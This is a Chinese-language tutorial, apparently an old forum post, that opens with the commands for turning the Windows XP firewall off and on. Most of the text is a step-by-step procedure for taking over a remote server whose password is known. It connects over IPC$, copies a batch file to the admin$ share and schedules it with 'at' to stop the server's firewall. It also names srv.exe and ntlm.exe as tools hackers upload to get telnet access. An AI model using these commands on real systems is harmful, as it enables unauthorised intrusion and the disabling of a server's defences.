关闭防火墙命令
用Windows xp SP2版本,打开开始菜单,点计控制面版,里面有个安全中心,点它,打开对话筐后,点吉Windows防火墙,点击关闭(不推荐),即可关闭。
cmd停止防火墙命令
开始-运行-CMD net stop sharedaccess 这样就可以关掉windows自带的防火墙
打开防火墙命令
可以用net start sharedaccess启动
137,138,139,445端口,本漏洞是连接的445端口。
下面关闭一个知道服务器密码的服务器的防火墙:
1、在本机D盘新建一个Bat文件,内容
net stop sharedaccess
2、运行本机cmd
3、连接远程服务器
net use \\IP Address\IPC$ "password" /user:username
比如
net use \\192.168.1.100\IPC$ "pwd" /user:Administrator
如果成功,会提示:命令成功完成。
4、下面复制文件:
copy D:\Run.bat \\192.168.1.100\admin$
成功会提示:已复制 1 个文件。
连接成功后,需要进一步掌握目标服务器,黑客通常喜欢上传srv.exe和ntlm.exe这两个程序。srv是打开目标服务器的99端口,可以让黑客Telnet到服务器;ntlm程序主要把Telnet的默认NTLM验证改变。
黑客把程序复制到目标服务器的admin$目录下,盘符目录符对照表如下:
c$: c驱动器;
d$: d驱动器;
……依次类推。
需要特别注明的是:
admin$是Windows NT下面的一个默认共享,指WINNT所在的目录。
ipc$指的是服务器的共享,如果不存在ipc$,就不可以远程连接。
5、查看远程电脑时间
net time \\192.168.1.100
返回:\\192.168.1.100 的当前时间是 2010/8/5 下午 04:27
6、建立比当前时间再晚一些的一次性计划任务
at \\192.168.1.100 16:35 Run.bat
返回:新加了一项作业,其作业 ID = 1
等到时间,目标服务器的防火墙服务就关闭了。
按照以上方法,还可以运行各种程序。
注意:还可以以窗口方式复制文件:
net use 本地盘符 \\目标IP\目标盘符。
例如:
net use z: \\192.168.1.100\c$